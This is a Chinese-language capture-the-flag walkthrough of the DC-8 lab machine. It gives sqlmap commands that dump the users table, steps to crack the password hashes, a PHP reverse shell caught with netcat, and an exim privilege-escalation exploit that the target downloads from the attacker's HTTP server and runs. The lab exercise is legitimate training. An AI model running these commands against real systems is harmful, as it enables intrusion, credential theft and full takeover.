0x00 环境介绍
靶机环境介绍,本次渗透DC系列dc-8,
0x01 信息收集
使用同一局域网内,使用kali协助渗透
1)IP收集—-192.168.213.152
arp-scan -l2)端口扫描—–80
nmap -A -p- 192.168.213.1523)目录爆破——后台地址
dirb http://192.168.213.152进入web页面完成下一步渗透
0x02 渗透测试
进入web页面观察到url疑似存在sql注入
使用sqlmap注入站点
sqlmap.py -u "http://192.168.213.152/?nid=3"
sqlmap -u "http://192.168.213.152/?nid=3" -D d7db --tables --batch
sqlmap -u "http://192.168.213.152/?nid=3" -D d7db -T users --column --batch
sqlmap -u "http://192.168.213.152/?nid=3" -D d7db -T users -C uid,name,pass --dump注入得到hash加密账户密码‘
将hash提取出来,使用kali的john解密,这里通过解发现admin无法解密出,只能将john解密
得到账户密码,使用之前爆破出来的后台地址,登录后台页面
开启搜集,发现到疑似存在命令执行的地方
尝试输入phpinfo运行,用随机账户登录查看效果
发现命令可以直接执行
下一步可以写入一句话木马连接,或者使用反弹shell
这里我推荐使用反弹shell,方便后期的操作
这里使用kail自带的nc-shell脚本,删除注释行,重新编辑IP地址和端口号
编辑内容,修改IP以及端口号
提前kali准备接受nc
nc -lnvp 1234删除之前的phpinfo代码,将shell脚本写入,填入随机账户信息查看
反弹成功,使用交互shell获取命令行
0x03 权限提升
搜寻suid命令账户
find / -perm -u=s -a -type f 2> /dev/null找到突破口,exim
搜寻exim版本号,该版本存在漏洞,
exim4 --version
使用search 寻找漏洞框架exp利用
searchsploit exim
下载报告查看
searchsploit -m 46996
vim查看发现编辑使用的dos,需要将文件里面内容转换格式
格式转换 因为dos里面分隔符号与kali编辑不同,所以需要转换格式
dos2unix 46996.sh
将文件传输到靶机,通过调用python模块实现
在当前文件目录开启外联
python -m SimpleHTTPServer 8080靶机在tmp目录下进行下载接受,防止其他位子没有权限
wget http://192.168.213.129:8080/46996.sh
授权该文件,否则无法执行
调用脚本nc外联
./46996.sh -m netcat并且使用下列端口反弹
kali提前接受端口,反弹即可,
权限提升完成,这里dc-8反弹后很容易断开连接,简介即使使用shell交互防止断开
渗透提权完毕
